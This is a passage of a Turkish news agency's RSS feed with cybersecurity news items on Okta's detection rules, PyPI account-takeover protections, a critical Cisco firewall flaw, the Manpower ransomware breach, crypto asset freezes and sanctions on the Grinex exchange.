<p data-start="1430" data-end="1708">Elastic açıklamasında, güvenlik araştırmalarında koordineli açıklamanın esas olduğunu, ancak bu raporda sürecin takip edilmediğini vurguladı. Şirket, 2017’den bu yana hata ödül programı kapsamında güvenlik araştırmacılarına 600.000 dolardan fazla ödeme yapıldığını hatırlattı.</p>
<p data-start="1710" data-end="1915"><strong data-start="1710" data-end="1722"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Okta, Auth0 kullanıcıları için hesap ele geçirme ve tehdit tespiti amacıyla açık kaynaklı kurallar kataloğu yayımladı</title>
            <link>https://cumha.com.tr/okta-auth0-kullanicilari-icin-hesap-ele-gecirme-ve-tehdit-tespiti-amaciyla-acik-kaynakli-kurallar-katalogu-yayimladi</link>
            <guid>https://cumha.com.tr/okta-auth0-kullanicilari-icin-hesap-ele-gecirme-ve-tehdit-tespiti-amaciyla-acik-kaynakli-kurallar-katalogu-yayimladi</guid>
            <description><![CDATA[ Kimlik ve erişim yönetimi platformu Auth0’nun geliştiricisi Okta, şüpheli davranışların tespitini kolaylaştırmak için Sigma tabanlı hazır sorgular içeren açık kaynaklı bir kurallar kataloğunu kullanıma sundu. Yeni sistem, hesap ele geçirme girişimleri, sahte yönetici hesapları, SMS bombardımanı ve token hırsızlığı gibi tehditlerin log analizlerinde erken fark edilmesine yardımcı olacak. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a59a09ca8f2.webp" length="43478" type="image/webp"/>
            
            <pubDate>Wed, 20 Aug 2025 12:50:26 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords></media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="567" data-end="929">Okta, Auth0 kullanıcılarının güvenlik tehditlerini daha hızlı tespit edebilmesi için Sigma tabanlı kurallardan oluşan açık kaynaklı bir “Customer Detection Catalog” yayımladı. Yeni kurallar seti, şüpheli etkinliklerin log kayıtları üzerinden daha kolay analiz edilmesini sağlayarak hesap ele geçirme ve yapılandırma hataları gibi risklere karşı koruma sunuyor.</p>
<p data-start="931" data-end="1301"><strong data-start="931" data-end="962">Yeni katalog neler içeriyor</strong><br data-start="962" data-end="965">Auth0, dünya genelinde birçok kurum tarafından kimlik doğrulama ve kullanıcı yönetimi amacıyla kullanılan bir platform. Daha önce kullanıcıların şüpheli aktiviteleri tespit etmek için kendi kurallarını yazmaları gerekiyordu. Okta’nın yayımladığı katalog ise, topluluk katkısına açık şekilde sürekli güncellenen hazır sorgular sunuyor.</p>
<p data-start="1303" data-end="1632">Şirketin açıklamasına göre bu kurallar, anormal kullanıcı davranışlarını, potansiyel hesap ele geçirmelerini, hatalı yapılandırmaları ve sahte yönetici hesaplarının oluşturulmasını ortaya çıkarabiliyor. Ayrıca SMS bombardımanı ve token hırsızlığı gibi saldırı yöntemlerinin log kayıtları üzerinden izlenmesine de imkan tanıyor.</p>
<p data-start="1634" data-end="1969"><strong data-start="1634" data-end="1653">Kullanım süreci</strong><br data-start="1653" data-end="1656">Kullanıcılar, kurallara GitHub üzerinden erişebiliyor. Sigma uyumlu sorgular, <code data-start="1734" data-end="1745">sigma-cli</code> gibi dönüştürücüler aracılığıyla farklı SIEM veya log analiz sistemlerine uyarlanabiliyor. Kurallar önce geçmiş loglar üzerinde test edilerek yanlış pozitif sonuçlar ayıklanabiliyor, ardından canlı ortama aktarılabiliyor.</p>
<p data-start="1971" data-end="2160">Okta, kullanıcıların kendi geliştirdikleri kuralları da GitHub deposuna “pull request” yoluyla ekleyebileceğini, böylece topluluk temelli bir güvenlik katmanı oluşturulacağını belirtiyor.</p>
<p data-start="2162" data-end="2426"><strong data-start="2162" data-end="2174"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>PyPI, hesap ele geçirmede kullanılan alan adı yeniden canlandırma saldırılarını engelleyen yeni güvenlik önlemleri getirdi</title>
            <link>https://cumha.com.tr/pypi-hesap-ele-gecirmede-kullanilan-alan-adi-yeniden-canlandirma-saldirilarini-engelleyen-yeni-guvenlik-oenlemleri-getirdi</link>
            <guid>https://cumha.com.tr/pypi-hesap-ele-gecirmede-kullanilan-alan-adi-yeniden-canlandirma-saldirilarini-engelleyen-yeni-guvenlik-oenlemleri-getirdi</guid>
            <description><![CDATA[ Python ekosisteminin resmi paket deposu PyPI, alan adı süresi dolduğunda saldırganların e-posta adreslerini ele geçirip hesaplara erişmesine olanak tanıyan saldırı türüne karşı yeni korumalar uygulamaya başladı. Haziran 2025’ten bu yana günlük taramalarla 1.800’den fazla e-posta adresi doğrulamasını kaybetti. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a599fd4acc4.webp" length="84834" type="image/webp"/>
            
            <pubDate>Wed, 20 Aug 2025 12:50:20 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords></media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="493" data-end="719">Açık kaynak Python paketlerinin resmi deposu olan Python Package Index (PyPI), alan adı süresi dolan e-posta adreslerini kullanarak gerçekleştirilen hesap ele geçirme saldırılarına karşı yeni güvenlik önlemleri devreye aldı.</p>
<p data-start="721" data-end="1129"><strong data-start="721" data-end="754">Saldırı yöntemi nasıl işliyor</strong><br data-start="754" data-end="757">PyPI üzerindeki proje geliştiricilerinin hesapları, e-posta adresleriyle bağlantılı olarak çalışıyor. Bazı adresler özel alan adlarına bağlı olduğunda, bu alan adı süresi dolduğunda saldırganlar aynı alan adını yeniden kaydedebiliyor. Sonrasında bir e-posta sunucusu kurarak parola sıfırlama talebinde bulunabiliyor ve ilgili PyPI hesabının kontrolünü ele geçirebiliyor.</p>
<p data-start="1131" data-end="1464">Bu tür saldırılar tedarik zinciri riski yaratıyor. Ele geçirilen hesaplarla popüler Python paketlerinin kötü amaçlı sürümleri yayımlanabiliyor ve bu paketler <code data-start="1289" data-end="1294">pip</code> üzerinden otomatik yüklenebiliyor. Daha önce Mayıs 2022’de “ctx” paketine yapılan saldırıda saldırganlar Amazon AWS anahtarlarını hedef alan kötü amaçlı kod eklemişti.</p>
<p data-start="1466" data-end="1816"><strong data-start="1466" data-end="1489">Yeni koruma sistemi</strong><br data-start="1489" data-end="1492">PyPI, alan adlarının yaşam döngüsünü (aktif, ek süre, kurtarma süresi, silinme beklemede) Domainr’ın Status API servisini kullanarak kontrol ediyor. Alan adı süresi dolmuş veya sona erme aşamasına girmişse, bu e-posta adresleri doğrulamasını kaybediyor ve parola sıfırlama ya da hesap kurtarma işlemlerinde kullanılamıyor.</p>
<p data-start="1818" data-end="2004">Yeni sistemin geliştirilmesi Nisan 2025’te başladı ve Haziran 2025’te günlük taramalarla devreye alındı. O tarihten bu yana 1.800’den fazla e-posta adresi bu kapsamda geçersiz sayıldı.</p>
<p data-start="2006" data-end="2227"><strong data-start="2006" data-end="2032">Kullanıcılara öneriler</strong><br data-start="2032" data-end="2035">PyPI, kullanıcıların hesaplarına özel alan adı yerine genel e-posta servislerinden yedek bir adres eklemelerini ve hesap güvenliği için iki faktörlü kimlik doğrulama kullanmalarını öneriyor.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>300 milyon dolarlık kripto para siber dolandırıcılık operasyonlarında donduruldu</title>
            <link>https://cumha.com.tr/300-milyon-dolarlik-kripto-para-siber-dolandiricilik-operasyonlarinda-donduruldu</link>
            <guid>https://cumha.com.tr/300-milyon-dolarlik-kripto-para-siber-dolandiricilik-operasyonlarinda-donduruldu</guid>
            <description><![CDATA[ Uluslararası iş birliğiyle yürütülen iki ayrı girişimde, siber suç ve dolandırıcılık faaliyetlerinden elde edildiği tespit edilen 300 milyon dolardan fazla kripto varlık donduruldu. TRM Labs, Tether, Binance ve Chainalysis gibi büyük blockchain şirketlerinin destek verdiği operasyonlarda, çok sayıda ülkede kara para aklama, yatırım dolandırıcılığı ve fidye yazılımı gibi suçlara karşı adımlar atıldı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a599f0b5df5.webp" length="60974" type="image/webp"/>
            
            <pubDate>Wed, 20 Aug 2025 12:49:41 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords></media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="543" data-end="799">Siber suçlarla bağlantılı kripto paraların izlenmesi ve engellenmesine yönelik iki farklı girişim kapsamında, 300 milyon dolardan fazla değerde dijital varlık donduruldu. Çalışmalar, uluslararası kolluk kuvvetleri ile özel sektör iş birliğinde yürütüldü.</p>
<p data-start="801" data-end="1203"><strong data-start="801" data-end="820">T3 FCU girişimi</strong><br data-start="820" data-end="823">TRM Labs, TRON ve Tether tarafından 2024 yılında başlatılan T3 Finansal Suç Birimi (T3 FCU), bugüne kadar 250 milyon doların üzerinde suç gelirini dondurdu. Binance’in ilk resmi üye olarak katıldığı girişimde, milyonlarca işlem analiz edilerek kara para aklama, yatırım dolandırıcılığı, terör finansmanı ve fidye yazılımları gibi vakalarla ilgili soruşturmalara destek sağlandı.</p>
<p data-start="1205" data-end="1461">TRM Labs tarafından yapılan açıklamada, Eylül 2024’ten bu yana beş kıtada 3 milyar doların üzerinde işlem hacminin izlendiği, bu kapsamda özellikle “romantik tuzak” adı verilen dolandırıcılık yöntemlerine yönelik 6 milyon doların dondurulduğu belirtildi.</p>
<p data-start="1463" data-end="1842"><strong data-start="1463" data-end="1502">Kanada ve ABD merkezli operasyonlar</strong><br data-start="1502" data-end="1505">Diğer girişim ise ABD ve Kanada’nın yürüttüğü, Chainalysis uzmanlarının destek verdiği operasyonlarla gerçekleşti. Ontario Eyalet Polisi tarafından yürütülen “Project Atlas” ve Britanya Kolumbiyası Menkul Kıymetler Komisyonu tarafından yönetilen “Operation Avalanche” kapsamında, son altı ayda 74,3 milyon dolarlık kayıp tespit edildi.</p>
<p data-start="1844" data-end="2113">Chainalysis verilerine göre, bu operasyonlar kapsamında 14 farklı ülkede 2.000’den fazla kripto cüzdan adresi belirlendi. Tether ile yapılan iş birliği sayesinde 50 milyon dolardan fazla USDT kara listeye alındı ve suçluların bu varlıkları nakde çevirmesi engellendi.</p>
<p data-start="2115" data-end="2309">Uzmanlara göre, bu tür küresel iş birlikleri, siber suçların finansman kaynaklarını kurutma ve suç gelirlerinin dolaşımını blockchain üzerinde doğrudan engelleme açısından kritik önem taşıyor.</p>
<p data-start="2311" data-end="2522"><strong data-start="2311" data-end="2323"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Cisco, Firewall Management Center’da en yüksek seviyeli güvenlik açığını duyurdu: Uzak kod çalıştırma riski</title>
            <link>https://cumha.com.tr/cisco-firewall-management-centerda-en-yuksek-seviyeli-guvenlik-acigini-duyurdu-uzak-kod-calistirma-riski</link>
            <guid>https://cumha.com.tr/cisco-firewall-management-centerda-en-yuksek-seviyeli-guvenlik-acigini-duyurdu-uzak-kod-calistirma-riski</guid>
            <description><![CDATA[ Cisco, Secure Firewall Management Center yazılımındaki RADIUS bileşeninde keşfedilen ve CVSS 10.0 ile değerlendirilen kritik güvenlik açığını (CVE-2025-20265) duyurdu. Açık, kimlik doğrulama sırasında özel hazırlanmış girişlerle istismar edilerek yetkisiz saldırganların sistemde ayrıcalıklı komut çalıştırmasına yol açabiliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a4438cef475.webp" length="61140" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:16:02 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>CVE-2025-20265 açığı saldırganlara hangi imkânları veriyor, hangi FortiWeb sürümleri etkileniyor, Cisco geçici çözüm olarak ne öneriyor, şirket başka hangi açıklar için yama yayımladı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="496" data-end="869"><strong data-start="496" data-end="520">Açığın teknik boyutu</strong><br data-start="520" data-end="523">CVE-2025-20265, RADIUS kimlik doğrulama sürecinde kullanıcı girdisinin doğru işlenmemesinden kaynaklanıyor. Etkinleştirildiğinde, saldırganların web veya SSH tabanlı yönetim arayüzüne kimlik bilgileri giriyormuş gibi davranarak özel hazırlanmış komutlar göndermesine olanak tanıyor. Bu komutlar cihazda yüksek ayrıcalıklarla çalıştırılabiliyor.</p>
<p data-start="871" data-end="1128"><strong data-start="871" data-end="901">Hangi sürümler etkileniyor</strong><br data-start="901" data-end="904">Cisco’ya göre açık, FMC yazılımının 7.0.7 ve 7.7.0 sürümlerinde, RADIUS kimlik doğrulaması aktifken ortaya çıkıyor. Bu, özellikle kurumsal ve devlet ağlarında merkezi kimlik doğrulama için sık kullanılan bir konfigürasyon.</p>
<p data-start="1130" data-end="1351"><strong data-start="1130" data-end="1158">Güncellemeler yayımlandı</strong><br data-start="1158" data-end="1161">Cisco, güvenlik açığını gidermek için ücretsiz yazılım güncellemelerini yayımladı. Yama, geçerli hizmet sözleşmesine sahip müşteriler için standart kanallar üzerinden erişilebilir durumda.</p>
<p data-start="1353" data-end="1590"><strong data-start="1353" data-end="1378">Geçici çözüm seçeneği</strong><br data-start="1378" data-end="1381">Yama yüklenemeyen ortamlarda önerilen tek geçici çözüm, RADIUS kimlik doğrulamasını devre dışı bırakarak yerine yerel kullanıcı hesapları, LDAP ya da SAML tabanlı kimlik doğrulama yöntemlerinin kullanılması.</p>
<p data-start="1592" data-end="1807"><strong data-start="1592" data-end="1619">Henüz istismar edilmedi</strong><br data-start="1619" data-end="1622">Açık, Cisco güvenlik araştırmacısı Brandon Sakai tarafından dahili testlerde keşfedildi. Şirket, açığın sahada istismar edildiğine dair herhangi bir bulguya sahip olmadığını açıkladı.</p>
<p data-start="1809" data-end="2064"><strong data-start="1809" data-end="1833">Ek güvenlik yamaları</strong><br data-start="1833" data-end="1836">Cisco ayrıca Snort 3, ASA, FTD, IOS ve IOS XE gibi ürünlerde hizmet reddi (DoS) ve HTML enjeksiyonu gibi 13 yüksek önem dereceli güvenlik açığını da kapattı. Bu açıkların hiçbirinin aktif olarak istismar edildiği raporlanmadı.</p>
<p><a href="https://beykozunsesi.com.tr/beykoz-haber" target="_blank" rel="noopener">beykoz haber</a></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Manpower veri ihlali: RansomHub saldırısında 145 bin kişinin bilgileri sızdırıldı</title>
            <link>https://cumha.com.tr/manpower-veri-ihlali-ransomhub-saldirisinda-145-bin-kisinin-bilgileri-sizdirildi</link>
            <guid>https://cumha.com.tr/manpower-veri-ihlali-ransomhub-saldirisinda-145-bin-kisinin-bilgileri-sizdirildi</guid>
            <description><![CDATA[ Dünyanın en büyük insan kaynakları şirketlerinden Manpower, Aralık 2024’te gerçekleşen siber saldırıda 145 bine yakın kişinin kişisel verilerinin çalındığını açıkladı. RansomHub fidye yazılımı grubu saldırıyı üstlenirken, çalınan 500 GB veride kimlik belgeleri, iletişim bilgileri, finansal kayıtlar ve gizli sözleşmelerin bulunduğu iddia edildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a445ab45c71.webp" length="57962" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:16:00 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Manpower veri ihlalinde kaç kişinin bilgileri sızdırıldı, RansomHub saldırıda hangi verileri çaldığını iddia etti, olay şirketin hangi şubesinden kaynaklandı, mağdurlara hangi destek sağlanıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="488" data-end="836"><strong data-start="488" data-end="532">Saldırı franchise şubesinden kaynaklandı</strong><br data-start="532" data-end="535">ManpowerGroup’un bir parçası olan Manpower, Aralık 2024 sonunda sistemlerine yetkisiz erişim sağlandığını ve saldırganların bazı dosyaları elde etmiş olabileceğini duyurdu. Olay, 20 Ocak 2025’te Michigan’ın Lansing kentindeki bir franchise şubesinde yaşanan BT kesintisi araştırılırken ortaya çıktı.</p>
<p data-start="838" data-end="1145"><strong data-start="838" data-end="870">145 bin kişi bilgilendirildi</strong><br data-start="870" data-end="873">Maine Başsavcılığı’na yapılan bildirimde, 144.189 kişinin verilerinin saldırıdan etkilendiği belirtildi. Çalınan veriler arasında kimlik bilgileri, pasaport taramaları, sosyal güvenlik numaraları, adresler, iletişim bilgileri ve test sonuçları yer alabileceği aktarıldı.</p>
<p data-start="1147" data-end="1618"><strong data-start="1147" data-end="1179">RansomHub saldırıyı üstlendi</strong><br data-start="1179" data-end="1182">RansomHub fidye yazılımı grubu, Ocak 2025’te saldırıyı üstlendiğini açıkladı. Grup, Manpower’ın sistemlerinden yaklaşık 500 GB veri çaldığını ve bunun içinde yıllara ait yazışmalar, mali tablolar, insan kaynakları verileri, gizli sözleşmeler ve NDA’ların bulunduğunu iddia etti. Daha sonra verilerin sızdırılacağına dair paylaşımlar grubun sızdırma sitesinden kaldırıldı, bu da fidyenin ödenmiş olabileceği ihtimalini gündeme getirdi.</p>
<p data-start="1620" data-end="1957"><strong data-start="1620" data-end="1642">Şirketten açıklama</strong><br data-start="1642" data-end="1645">ManpowerGroup sözcüsü, olayın yalnızca bağımsız bir franchise şubesini etkilediğini, şirketin kurumsal ağının saldırıdan etkilenmediğini vurguladı. Şirket, FBI ile iş birliği yaptığını ve etkilenen kişilere Equifax üzerinden ücretsiz kredi izleme ve kimlik hırsızlığına karşı koruma hizmeti sunduğunu açıkladı.</p>
<p data-start="1959" data-end="2338"><strong data-start="1959" data-end="1983">RansomHub’ın geçmişi</strong><br data-start="1983" data-end="1986">RansomHub, daha önce Halliburton, Rite Aid, Kawasaki, Christie's, Frontier Communications ve Planned Parenthood gibi kurumları da hedef aldı. Grup ayrıca Change Healthcare saldırısında 190 milyondan fazla kişinin etkilendiği verileri sızdırmıştı. FBI, Ağustos 2024 itibarıyla grubun 200’den fazla kritik altyapı kuruluşunu hedef aldığını bildirmişti.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>ABD’ye iade edilen hacker, vergi dolandırıcılığında 3,3 milyon dolar çalmakla suçlanıyor</title>
            <link>https://cumha.com.tr/abdye-iade-edilen-hacker-vergi-dolandiriciliginda-33-milyon-dolar-calmakla-suclaniyor</link>
            <guid>https://cumha.com.tr/abdye-iade-edilen-hacker-vergi-dolandiriciliginda-33-milyon-dolar-calmakla-suclaniyor</guid>
            <description><![CDATA[ Nijerya vatandaşı Chukwuemeka Victor Amachukwu, Fransa’dan ABD’ye iade edilerek sahte vergi iadeleri ve SBA kredi başvurularıyla 3,3 milyon dolar haksız kazanç elde etmekle suçlandı. 2019-2021 arasında vergi hazırlama şirketlerine yönelik oltalama saldırılarıyla binlerce ABD vatandaşının kişisel verileri çalındı. Sanık ayrıca sahte yatırım fırsatlarıyla milyonlarca dolarlık dolandırıcılık yapmakla da itham ediliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a445f50b894.webp" length="53744" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:15:58 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Hacker ABD’de hangi suçlarla itham ediliyor, saldırılarda hangi yöntemler kullanıldı, toplam ne kadar mali zarar oluştu, sanığın alabileceği cezalar neler</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="568" data-end="853"><strong data-start="568" data-end="611">Vergi hazırlama şirketleri hedef alındı</strong><br data-start="611" data-end="614">ABD Adalet Bakanlığı’na göre Amachukwu, 2019–2021 arasında ABD’deki vergi hazırlama şirketlerini hedef alan oltalama e-postalarıyla sistemlere izinsiz erişim sağladı. Bu yolla binlerce vatandaşın kişisel ve vergi bilgileri ele geçirildi.</p>
<p data-start="855" data-end="1102"><strong data-start="855" data-end="884">3,3 milyon dolarlık zarar</strong><br data-start="884" data-end="887">Sanığın, 8,4 milyon dolarlık sahte vergi iadesi başvurusu yaparak yaklaşık 2,5 milyon dolar elde ettiği, ayrıca sahte SBA kredi başvurularıyla 819 bin dolar çaldığı belirtildi. Toplam zarar 3,3 milyon doları aştı.</p>
<p data-start="1104" data-end="1355"><strong data-start="1104" data-end="1138">Sahte yatırım planı da yürüttü</strong><br data-start="1138" data-end="1141">Savcılığa göre Amachukwu, aynı dönemde sahte yatırım teklifleriyle de mağdurları kandırdı. “Standby letter of credit” gibi gerçekte var olmayan finansal araçları satarak milyonlarca doları kendi hesabına aktardı.</p>
<p data-start="1357" data-end="1549"><strong data-start="1357" data-end="1383">Fransa’dan iade edildi</strong><br data-start="1383" data-end="1386">Amachukwu, 4 Ağustos 2025’te Fransa’dan ABD’ye iade edildi ve ertesi gün New York Güney Bölgesi’nde hâkim karşısına çıkarıldı. Henüz duruşma tarihi belirlenmedi.</p>
<p data-start="1551" data-end="1906"><strong data-start="1551" data-end="1584">Ciddi cezalarla karşı karşıya</strong><br data-start="1584" data-end="1587">Sanık hakkında bilgisayar korsanlığına teşebbüs (5 yıl), iki kez kablolu dolandırıcılık (her biri 20 yıl), iki kez kablolu dolandırıcılığa teşebbüs (her biri 20 yıl) ve ağırlaştırılmış kimlik hırsızlığı (zorunlu 2 yıl ek ceza) suçlamaları bulunuyor. Ayrıca elde ettiği tüm malvarlıklarına el konulması talep ediliyor.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Küresel operasyonlarda siber suçlulara ait 300 milyon dolardan fazla kripto para donduruldu</title>
            <link>https://cumha.com.tr/kuresel-operasyonlarda-siber-suclulara-ait-300-milyon-dolardan-fazla-kripto-para-donduruldu</link>
            <guid>https://cumha.com.tr/kuresel-operasyonlarda-siber-suclulara-ait-300-milyon-dolardan-fazla-kripto-para-donduruldu</guid>
            <description><![CDATA[ TRM Labs, Tether, TRON ve Binance’in ortak girişimiyle yürütülen T3+ Global Collaborator Programı ile Kanada ve ABD’nin iş birliğinde Chainalysis destekli operasyonlarda toplam 300 milyon dolardan fazla yasa dışı kripto varlık ele geçirildi. Fonların büyük kısmı yatırım dolandırıcılığı, kara para aklama ve aşk tuzağı (romance scam) gibi suçlarla bağlantılı çıktı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a445cd00ca6.webp" length="75122" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:10:08 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Kanada-ABD ortak operasyonları hangi sonuçları verdi, hangi ülkeler mağdurlar arasında, suç gelirlerinin blockchain üzerinde nasıl engellendi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="517" data-end="921"><strong data-start="517" data-end="565">T3+ programı ile 250 milyon dolar donduruldu</strong><br data-start="565" data-end="568">Eylül 2024’te kurulan T3 Financial Crime Unit, bugüne kadar dünya genelinde 250 milyon dolarlık suç gelirini dondurdu. Bu girişim, TRM Labs, Tether ve TRON tarafından başlatıldı, Binance ise resmi katılımcı oldu. Çalışmalar kapsamında kara para aklama, yatırım dolandırıcılığı, şantaj ve terör finansmanı gibi suçlara yönelik binlerce işlem incelendi.</p>
<p data-start="923" data-end="1062">Öne çıkan vakalardan birinde, Binance iş birliğiyle “romance scam” saldırılarında elde edilen 6 milyon dolarlık kripto varlık donduruldu.</p>
<p data-start="1064" data-end="1308"><strong data-start="1064" data-end="1119">Kanada-ABD iş birliğiyle 74 milyon dolar engellendi</strong><br data-start="1119" data-end="1122">Kanada Ontario Eyalet Polisi’nin yönettiği “Project Atlas” ve Britanya Kolumbiyası Menkul Kıymetler Komisyonu’nun yürüttüğü “Operation Avalanche”, Chainalysis analitiğiyle desteklendi.</p>
<p data-start="1310" data-end="1472">Son altı ayda 74,3 milyon dolarlık dolandırıcılık gelirine ulaşıldı ve büyük kısmı donduruldu. Tether iş birliğiyle 50 milyon dolarlık USDT kara listeye alındı.</p>
<p data-start="1474" data-end="1668"><strong data-start="1474" data-end="1490">Küresel etki</strong><br data-start="1490" data-end="1493">Project Atlas, 14 ülkede 2.000’den fazla kripto cüzdan adresini mağdurlarla ilişkilendirdi. Kanada, ABD, Almanya, Avustralya ve Birleşik Krallık mağdurlar arasında yer aldı.</p>
<p data-start="1670" data-end="1980"><strong data-start="1670" data-end="1713">Yöntem: blockchain seviyesinde müdahale</strong><br data-start="1713" data-end="1716">Her iki girişimde de koordineli operasyonlar ve blockchain düzeyinde doğrudan müdahalelerle suç gelirlerinin transfer edilmesi veya nakde çevrilmesi engellendi. Uzmanlar, bu modelin siber suçluların hareket alanını daraltmada kritik bir adım olduğunu belirtiyor.</p>
<p data-start="1982" data-end="2214"><strong data-start="1982" data-end="1994"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>ABD, Garantex’in halefi olarak kurulan Grinex kripto borsasına yaptırım uyguladı</title>
            <link>https://cumha.com.tr/abd-garantexin-halefi-olarak-kurulan-grinex-kripto-borsasina-yaptirim-uyguladi</link>
            <guid>https://cumha.com.tr/abd-garantexin-halefi-olarak-kurulan-grinex-kripto-borsasina-yaptirim-uyguladi</guid>
            <description><![CDATA[ ABD Hazine Bakanlığı, fidye yazılımı çetelerinin kara para aklamasına aracılık eden Garantex’in yerine kurulan Grinex’e yaptırım kararı aldığını duyurdu. Grinex’in, Garantex’in kapatılmasının hemen ardından kurulduğu ve milyarlarca dolarlık kripto işlemine aracılık ettiği belirtildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a4464d8fbfb.webp" length="53504" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:10:07 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Grinex kripto borsası nasıl kuruldu, Garantex hangi suçlarla ilişkilendiriliyor, ABD hangi kişi ve şirketlere yaptırım uyguladı, Dışişleri Bakanlığı ne kadar ödül teklif etti</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="425" data-end="764"><strong data-start="425" data-end="486">Garantex’in kapatılmasının ardından Grinex devreye alındı</strong><br data-start="486" data-end="489">ABD Gizli Servisi’nin Mart 2025’te Garantex’in alan adlarına el koymasının ardından şirket yöneticilerinin müşteri varlıklarını Grinex’e aktardığı tespit edildi. ABD Hazine Bakanlığı Yabancı Varlıklar Kontrol Ofisi (OFAC), dün itibarıyla Grinex’i yaptırım listesine ekledi.</p>
<p data-start="766" data-end="1082"><strong data-start="766" data-end="801">Yaptırımları aşmak için kuruldu</strong><br data-start="801" data-end="804">OFAC açıklamasında, Grinex’in tanıtım materyallerinde borsanın, Garantex’e yönelik yaptırımlar ve varlık dondurmaları sonrası kurulduğunun açıkça ifade edildiği vurgulandı. Grinex’in kuruluşundan bu yana milyarlarca dolarlık kripto para transferine aracılık ettiği belirtildi.</p>
<p data-start="1084" data-end="1364"><strong data-start="1084" data-end="1128">Garantex ve ortaklarına yeni yaptırımlar</strong><br data-start="1128" data-end="1131">OFAC ayrıca Garantex, üç kurucusu (Sergey Mendeleev, Aleksandr Mira Serda, Pavel Karavatsky) ve Rusya ile Kırgızistan’daki altı iş ortağı şirkete (InDeFi Bank, Exved, Old Vector, A7, A71, A7 Agent) yönelik yaptırımları da yeniledi.</p>
<p data-start="1366" data-end="1532"><strong data-start="1366" data-end="1382">Ödül çağrısı</strong><br data-start="1382" data-end="1385">ABD Dışişleri Bakanlığı, Garantex yöneticilerinin yakalanması veya mahkumiyetine yol açacak bilgiler için 6 milyon dolara kadar ödül teklif etti.</p>
<p data-start="1534" data-end="1872"><strong data-start="1534" data-end="1556">Geçmiş bağlantılar</strong><br data-start="1556" data-end="1559">Garantex, Hydra dark web pazarı ve Conti, Black Basta, LockBit, NetWalker, Ryuk, Phoenix Cryptolocker gibi fidye yazılımı gruplarıyla bağlantıları nedeniyle Nisan 2022’de yaptırım listesine alınmıştı. Bakanlığa göre Garantex, Nisan 2019–Mart 2025 arasında 96 milyar dolardan fazla kripto işlemine aracılık etti.</p>
<p data-start="1874" data-end="2179"><strong data-start="1874" data-end="1891">ABD’den mesaj</strong><br data-start="1891" data-end="1894">Hazine Bakanlığı Terörizm ve Mali İstihbarat Müsteşarı John K. Hurley, “Kripto borsalarını kara para aklama ve fidye yazılımlarına destek için kullanmak ulusal güvenliğimizi tehdit ediyor. Bu aktörleri ortaya çıkararak dijital varlık sektörünün bütünlüğünü korumaya kararlıyız” dedi.</p>
<p data-start="2181" data-end="2374"><strong data-start="2181" data-end="2193"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Plex, kullanıcılarını uyardı: Medya sunucunuzu hemen güncelleyin</title>
            <link>https://cumha.com.tr/plex-kullanicilarini-uyardi-medya-sunucunuzu-hemen-guncelleyin</link>
            <guid>https://cumha.com.tr/plex-kullanicilarini-uyardi-medya-sunucunuzu-hemen-guncelleyin</guid>
